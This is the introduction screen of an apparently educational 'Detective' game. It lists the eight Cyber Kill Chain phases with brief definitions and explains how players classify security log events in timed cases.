Welcome, Detective
Your mission: Analyze system logs from security incidents and classify each event according to the Cyber Kill Chain framework.
The Cyber Kill Chain
1. Reconnaissance
Gathering information about the target (scanning, enumeration, research)
2. Initial Access
First entry into the system (phishing, exploits, brute force)
3. Execution
Running malicious code on the compromised system
4. Persistence
Maintaining access to the system (backdoors, scheduled tasks)
5. Privilege Escalation
Gaining higher-level permissions (exploits, credential theft)
6. Lateral Movement
Moving through the network to other systems
7. Exfiltration
Stealing data from the compromised environment
8. Impact
Causing damage (encryption, deletion, disruption)
You'll investigate 8 cases. Click a log entry to select it, then click the correct kill chain phase to classify it. You have 45 seconds per case. Good luck, Detective!